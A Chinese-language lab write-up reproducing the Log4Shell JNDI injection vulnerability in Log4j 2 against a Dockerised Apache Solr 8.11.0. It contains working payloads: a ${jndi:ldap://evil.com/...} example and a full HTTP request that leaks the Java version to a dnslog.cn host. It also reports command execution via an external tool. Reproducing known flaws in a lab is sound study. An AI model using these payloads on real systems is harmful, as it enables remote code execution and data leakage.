漏洞介绍
Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于
${jndi:ldap://evil.com/example}的 lookup 用于进行JNDI注入,执行任意代码。(Apache不是一个特定的服务,而仅仅是一个第三方库,可以通过找到一些使用这个库的应用来复现这个漏洞。比如(Apache solr))
参考链接:
漏洞环境
Apache Log4j2 不是一个特定的Web服务,而仅仅是一个第三方库,我们可以通过找到一些使用了这个库的应用来复现这个漏洞,比如Apache Solr。
执行如下命令启动一个Apache Solr 8.11.0,其依赖了Log4j 2.14.1:
docker-compose up -d
服务启动后,访问
http://your-ip:8983即可查看到Apache Solr的后台页面。
漏洞复现
${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:
DNS平台:http://www.dnslog.cn/
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xcjtdp.dnslog.cn} HTTP/1.1
Host: 127.0.0.1:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
我们可以在DNS日志平台收到相关日志,显示出当前Java版本:
实际利用JNDI注入漏洞,可以使用这个工具。利用完毕后,可见
touch /tmp/success已经成功被执行:
